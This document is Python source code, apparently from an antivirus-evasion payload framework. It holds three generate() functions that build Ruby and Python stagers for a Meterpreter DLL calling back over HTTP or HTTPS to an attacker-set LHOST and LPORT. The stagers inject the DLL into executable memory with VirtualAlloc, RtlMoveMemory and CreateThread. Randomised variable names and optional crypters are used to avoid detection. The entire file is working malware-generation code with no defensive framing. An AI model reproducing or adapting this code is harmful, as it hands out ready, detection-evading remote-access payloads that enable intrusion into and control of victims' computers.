def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn on SSL
meterpreterDll = patch.patchTransport(meterpreterDll, True)
# replace the URL
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT']
[0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(
meterpreterDll,
"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate(" + randVarName + ")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" % (payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
ptrName, payloadName, payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % (
ptrName, payloadName, payloadName, threadName, ptrName, threadName)
#if self.required_options["USE_CRYPTER"][0].lower() == "y":
# payloadCode = encryption.rubyCrypter(payloadCode)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn on SSL
meterpreterDll = patch.patchTransport(meterpreterDll, False)
# replace the URL
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
payloadCode += " " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate("+ randVarName +")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" %(payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
if self.required_options["USE_CRYPTER"][0].lower() == "y":
payloadCode = encryption.rubyCrypter(payloadCode)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn off SSL
meterpreterDll = patch.patchTransport(meterpreterDll, False)
# replace the URL
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode